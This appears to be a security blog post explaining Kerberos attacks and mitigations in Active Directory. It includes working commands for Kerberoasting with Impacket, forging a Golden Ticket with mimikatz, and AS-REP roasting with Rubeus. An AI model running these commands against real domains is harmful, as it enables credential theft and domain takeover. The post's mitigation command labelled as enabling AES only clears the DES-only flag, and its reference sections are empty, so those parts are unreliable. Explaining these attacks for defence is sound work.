Kerberos Attacks & Mitigations

By /

Listen to this Post

👉🏻 What are Kerberos Attacks?

Kerberos is the predominant authentication protocol used in Microsoft Active Directory, replacing the less secure NTLM (New Technology LAN Manager). It uses tickets for domain users to authenticate against the Key Distribution Center (KDC) and Authentication Service (AS), typically hosted on domain controllers.

👉🏻 What topics are covered in the document?

  • Kerberos Terminology
  • Process Overview
  • Golden Tickets
  • Silver Tickets
  • Kerberoasting
  • AS-REP Roasting
  • Mitigations for all Attacks

Practice-Verified Commands and Codes

1. Kerberoasting Attack Simulation

Use `Impacket` to extract service account hashes:

python GetUserSPNs.py -request -dc-ip <DC_IP> <DOMAIN>/<USER>:<PASSWORD> -outputfile hashes.txt

2. Golden Ticket Attack

Generate a Golden Ticket using `mimikatz`:

mimikatz # kerberos::golden /user:Administrator /domain:<DOMAIN> /sid:<SID> /krbtgt:<KRBTGT_HASH> /ptt

3. AS-REP Roasting

Use `Rubeus` to request AS-REP hashes:

Rubeus.exe asreproast /user:<USER> /format:hashcat /outfile:asrep_hashes.txt

4. Mitigation Commands

  • Enable AES encryption for Kerberos: 
    Set-ADAccountControl -Identity <USER> -UseDESKeyOnly $false
  • Monitor Kerberos TGS requests: 
    Get-WinEvent -LogName Security | Where-Object { $_.ID -eq 4769 }

What Undercode Say

Kerberos remains a cornerstone of secure authentication in Active Directory environments, but its complexity and widespread use make it a prime target for attackers. Understanding the nuances of Kerberos attacks, such as Golden Tickets, Silver Tickets, Kerberoasting, and AS-REP Roasting, is critical for cybersecurity professionals.

Golden Tickets exploit the KRBTGT account to grant unauthorized access, while Silver Tickets forge service tickets for specific services. Kerberoasting targets service accounts with weak passwords, and AS-REP Roasting preys on accounts with pre-authentication disabled.

To mitigate these threats, enforce strong password policies, enable AES encryption, and regularly monitor Kerberos TGS requests. Use tools like Impacket, mimikatz, and `Rubeus` for testing and detection. Additionally, disable unnecessary service accounts and ensure pre-authentication is enabled for all users.

For further reading, refer to:

By mastering these techniques and commands, you can better secure your environment against Kerberos-based threats. Stay vigilant, and always keep your systems updated with the latest security patches.

References:

Reported By: Mohamed Abdelgadr – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification ✅Featured Image

Related Posts: